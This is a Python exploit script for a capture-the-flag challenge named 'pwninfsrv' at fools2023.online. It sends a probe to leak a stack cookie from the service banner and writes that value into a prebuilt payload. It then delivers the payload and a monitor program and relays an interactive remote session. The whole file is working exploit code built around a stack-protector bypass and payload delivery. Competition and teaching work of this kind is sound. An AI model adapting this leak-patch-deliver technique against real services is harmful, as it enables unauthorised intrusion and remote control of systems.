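#!/usr/bin/env python3
"""Exploit driver for the fools2023 "pwninfsrv" challenge.

What this script does (everything below is taken from the code itself; the
remote protocol is not documented here, so treat the banner format as an
observation, not a contract):

1. connect to fools2023.online:13339 and send a fixed probe;
2. scrape a 4-byte value (8 hex digits after "Welcome, ") out of the reply --
   the original author calls it the stack cookie;
3. write that value into the prebuilt payload at offset len(payload) - 0x100;
4. send "\n" + payload + "\n", then MONITOR.PRG from offset 0x1000 onwards;
5. relay bytes between the terminal and the remote until either side hangs up.

The banner is the only untrusted input; parse_cookie() bounds it to exactly
8 hex digits before anything is decoded. Paths are relative to the current
working directory, exactly as in the original. select.poll() is used, so the
passthrough is POSIX-only.
"""
from sys import stdin, stdout
from binascii import unhexlify
import socket
import select

HOST = "fools2023.online"
PORT = 13339

# Probe that makes the service include the cookie in its greeting.
COOKIE_PROBE = unhexlify("f14ff7f150f7f151f7f152f70a")
BANNER_MARKER = "Welcome, "
COOKIE_LEN = 4  # bytes; appears as 8 hex digits in the banner

PAYLOAD_PATH = "../prog/custom/pwninfsrv.prg"
MONITOR_PATH = "../prog/MONITOR.PRG"
MONITOR_SKIP = 0x1000          # bytes of MONITOR.PRG that are not sent
COOKIE_OFFSET_FROM_END = 0x100  # cookie slot sits this far before the payload end


def recv_until_quiet(sock, idle=0.1, chunk=1024):
    """Read from *sock* until the peer goes quiet for *idle* seconds or closes.

    Returns the collected bytes. The socket's timeout is restored to blocking
    on exit. A closed peer makes recv() return b"" immediately instead of
    timing out, which the original loop turned into a busy spin -- that case
    now terminates the read.
    """
    buf = bytearray()
    sock.settimeout(idle)
    try:
        while True:
            try:
                data = sock.recv(chunk)
            except socket.timeout:
                break
            if not data:  # peer closed the connection
                break
            buf += data
    finally:
        sock.settimeout(None)
    return bytes(buf)


def parse_cookie(banner):
    """Extract the cookie bytes from the decoded greeting *banner*.

    The cookie is the 8 hex digits immediately following the first
    "Welcome, ". Raises ValueError when the marker is missing or fewer than
    8 characters follow it (the original silently sliced from index 8 when
    find() returned -1 and would have patched garbage into the payload), and
    binascii.Error when those characters are not hex.
    """
    marker_at = banner.find(BANNER_MARKER)
    if marker_at < 0:
        raise ValueError(f"marker {BANNER_MARKER!r} not found in banner {banner!r}")
    start = marker_at + len(BANNER_MARKER)
    digits = banner[start:start + 2 * COOKIE_LEN]
    if len(digits) != 2 * COOKIE_LEN:
        raise ValueError(f"expected {2 * COOKIE_LEN} hex digits after marker, got {digits!r}")
    return unhexlify(digits)


def patch_cookie(code, cookie, offset_from_end=COOKIE_OFFSET_FROM_END):
    """Return a bytearray copy of *code* with *cookie* written in place.

    The cookie goes at len(code) - offset_from_end. Raises ValueError if the
    payload is too short to hold it there; the original would have indexed
    from the end with a negative offset and patched the wrong bytes.
    """
    patched = bytearray(code)
    off = len(patched) - offset_from_end
    if off < 0 or off + len(cookie) > len(patched):
        raise ValueError(
            f"payload of {len(patched)} bytes cannot hold a {len(cookie)}-byte "
            f"cookie at offset {off}"
        )
    patched[off:off + len(cookie)] = cookie
    return patched


def passthrough(sock):
    """Relay bytes between the terminal and *sock* one byte at a time.

    Returns when stdin reaches EOF or the peer closes; the original looped
    forever on either condition because an empty read was re-sent as nothing.
    POSIX-only (select.poll).
    """
    poller = select.poll()
    poller.register(stdin.buffer, select.POLLIN | select.POLLPRI)
    poller.register(sock, select.POLLIN | select.POLLPRI)
    stdin_fd = stdin.buffer.fileno()
    sock_fd = sock.fileno()
    while True:
        for fd, _event in poller.poll():
            if fd == stdin_fd:
                data = stdin.buffer.read(1)
                if not data:  # EOF on the terminal
                    return
                sock.sendall(data)
            elif fd == sock_fd:
                data = sock.recv(1)
                if not data:  # peer closed
                    return
                stdout.buffer.write(data)
                stdout.buffer.flush()


def main():
    """Run the full exploit: leak, patch, deliver, then interactive shell."""
    # Read local files first so a missing file fails before touching the network.
    with open(PAYLOAD_PATH, "rb") as f:
        code = f.read()
    with open(MONITOR_PATH, "rb") as f:
        monitor = f.read()

    # AF_INET kept on purpose: the original never attempted IPv6.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.connect((HOST, PORT))

        # Sniff out the stack cookie. errors="replace" keeps a stray non-UTF-8
        # byte in the banner from aborting the run; the hex digits are ASCII.
        sock.sendall(COOKIE_PROBE)
        banner = recv_until_quiet(sock).decode(errors="replace")
        cookie = parse_cookie(banner)

        # sendall() instead of send(): a short send would have truncated the
        # payload silently.
        payload = patch_cookie(code, cookie)
        sock.sendall(b"\n" + bytes(payload) + b"\n")
        sock.sendall(monitor[MONITOR_SKIP:])

        passthrough(sock)


if __name__ == "__main__":
    main()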